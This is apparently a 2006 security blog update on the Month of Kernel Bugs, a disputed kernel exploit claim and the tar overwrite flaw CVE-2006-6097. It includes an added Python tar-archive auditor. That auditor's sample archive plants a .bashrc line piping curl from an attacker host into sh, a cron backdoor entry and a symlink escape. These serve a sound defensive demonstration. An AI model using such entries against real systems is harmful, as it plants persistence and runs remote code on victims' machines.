I'm back after a week off. I can't say anything much happened in the two weeks since my last update. In general that's a good thing, as when I have a busy week, most system administrators are going to also have a busy week. This time of year tends to be a bit on the slow side. I've spoken at length with various people I know about this. We're not sure why, but one of the theories is that the students are busy with finals at this time of year, so there are fewer student researchers practicing their craft until January.
Month of kernel bugs
The end of November also meant the end of the Month of Kernel Bugs project. If you've not heard of this project, don't feel bad. It turned out to be mostly unexciting. A few months back there was an effort called the Month of Browser Bugs. That effort proved very fruitful and found many dangerous flaws. I think this is understandable given the complexity of rendering all the various HTML bits. Kernels, it seems, are a bit harder to find meaningful exploits for. Eleven of the 30 affected the Linux kernel; none were very dangerous. A number of the flaws were in third-party Windows drivers, which leads me to believe the project had to search to find 30 of these.
Kernel remote root?
I ran across this story about a potential Linux kernel remote root exploit. I'm hesitant to believe this story is anything more than an attempt to extort more money out of potential customers. Even if this is real, it raises the question: is handling such information in this way ethical? The company in question, Digital Armaments, seems to have a business model based on scaring people into subscribing to their service.
If there is a market for this service (which I doubt), who am I to say an organization shouldn't make money off of it? In the same respect though, not reporting an issue like this in a responsible manner places a great number of people at risk. If I was going to come up with an analogy, this would be like an automobile repair shop telling car owners their cars may explode in a ball of fire, but only they know how to fix it. I suspect in the real world there would be a great deal of outcry over such behavior.
tar
The only vulnerability that appeared in the last two weeks I feel is worth noting is a tar issue which allows a malicious tar archive to overwrite arbitrary files (CVE-2006-6097). I mention this as there has been a fair amount of banter regarding this flaw. There are a number of people who want to consider this issue to be more than it is. I admit that in theory, this issue seems to be a big deal. If I untar an archive, it should not write outside of the current directory. I like to use an issue such as this to point out the difference between theory and practice.
In theory, this flaw could allow an attacker to overwrite any file I have access to. That means if I'm root, the entire machine could be compromised. If I'm a normal user, they could modify my .bashrc file, or various other files that are parsed upon program execution. This could theoretically let an attacker take control of my machine.
In practice, however, I don't see how this issue is worth making a fuss over. First I have to acquire a malicious tar archive. I then have to try to unarchive it. The creator of the archive would have to know enough about my environment to ensure that a useful file is overwritten. This means that any real attack is going to target a specific victim. Right now in the world of security, if someone is going to target a victim, there are better and easier ways to do so than this. The real threat is mass attacks: something that can compromise thousands of users by visiting a web page or receiving an email. Far too often I see people obsess over a small issue like this while ignoring the fact that their web browser is full of unfixed dangerous holes.
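The invariant stated above ("if I untar an archive, it should not write outside of the current directory") is cheap to check before extracting anything. The following is an added example, not code from the original post, and it does not reproduce the specific mechanism of CVE-2006-6097; it audits a tar archive for the general ways an entry can escape the extraction directory: absolute names, `..` traversal, symlink and hard-link targets that point outside, and a file written through a symlink the same archive planted earlier. The `EXTRACT_ROOT` anchor, the sample archive, its `.bashrc` and cron entries, and the `attacker.invalid` host are all constructed for the example.

```python
import io
import posixpath
import tarfile

# Notional extraction root used only for path arithmetic (an assumption of
# this example; nothing is written to disk).
EXTRACT_ROOT = "/extract"


def escapes(path, root=EXTRACT_ROOT):
    """True if `path`, interpreted relative to `root`, resolves outside `root`."""
    if posixpath.isabs(path):
        return True
    resolved = posixpath.normpath(posixpath.join(root, path))
    root = posixpath.normpath(root)
    return resolved != root and not resolved.startswith(root + "/")


def audit_archive(data, root=EXTRACT_ROOT):
    """Return [(member name, [reasons])] for every entry that could write
    outside `root`. Members are examined in archive order, because a symlink
    planted by an earlier entry changes where a later entry's path lands."""
    findings = []
    planted_links = {}  # normalized member name -> resolved link target
    with tarfile.open(fileobj=io.BytesIO(data), mode="r") as tf:
        for m in tf.getmembers():
            reasons = []
            name = posixpath.normpath(m.name)
            if escapes(m.name, root):
                reasons.append("name escapes extraction root")
            # Walk the parent components; if one is a symlink this same
            # archive created, the write is redirected to wherever it points.
            parts = name.split("/")
            for i in range(1, len(parts)):
                parent = "/".join(parts[:i])
                if parent in planted_links:
                    reasons.append("path goes through archive symlink %s -> %s"
                                   % (parent, planted_links[parent]))
                    break
            if m.issym():
                # Symlink targets resolve relative to the link's own directory.
                target = posixpath.join(posixpath.dirname(name), m.linkname)
                if escapes(target, root):
                    reasons.append("symlink target %s escapes root" % m.linkname)
                planted_links[name] = posixpath.normpath(target)
            elif m.islnk():
                # Hard-link targets are archive-relative paths.
                if escapes(m.linkname, root):
                    reasons.append("hardlink target %s escapes root" % m.linkname)
            if reasons:
                findings.append((m.name, reasons))
    return findings


def build_sample_archive():
    """Constructed sample archive: one benign file plus four escape attempts.
    The paths and contents are made up for this example."""
    buf = io.BytesIO()
    with tarfile.open(fileobj=buf, mode="w") as tf:
        def add_file(name, payload):
            info = tarfile.TarInfo(name)
            info.size = len(payload)
            tf.addfile(info, io.BytesIO(payload))

        add_file("project/README", b"harmless\n")
        add_file("../.bashrc", b"curl http://attacker.invalid/x | sh\n")
        add_file("/etc/cron.d/backdoor", b"* * * * * root /tmp/x\n")
        link = tarfile.TarInfo("project/home")
        link.type = tarfile.SYMTYPE
        link.linkname = "/home/victim"
        tf.addfile(link)
        # Looks like a file inside project/, but lands in /home/victim/.
        add_file("project/home/.bashrc", b"echo pwned\n")
    return buf.getvalue()


if __name__ == "__main__":
    for name, reasons in audit_archive(build_sample_archive()):
        print("REFUSE %-24s %s" % (name, "; ".join(reasons)))
```

Running the module refuses all four hostile entries and passes `project/README`. The check is deliberately conservative: any write through an archive-supplied symlink is flagged even if the link target happens to be inside the root, since a later entry could retarget it. Newer Python (3.12, with backports to maintained 3.8 through 3.11 releases) builds comparable checks into `tarfile` via `extractall(..., filter="data")`; the point of writing it out here is to make the invariant explicit.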
That's all for this week. Hopefully there's nothing to talk about next week; my nethack skills are getting rusty.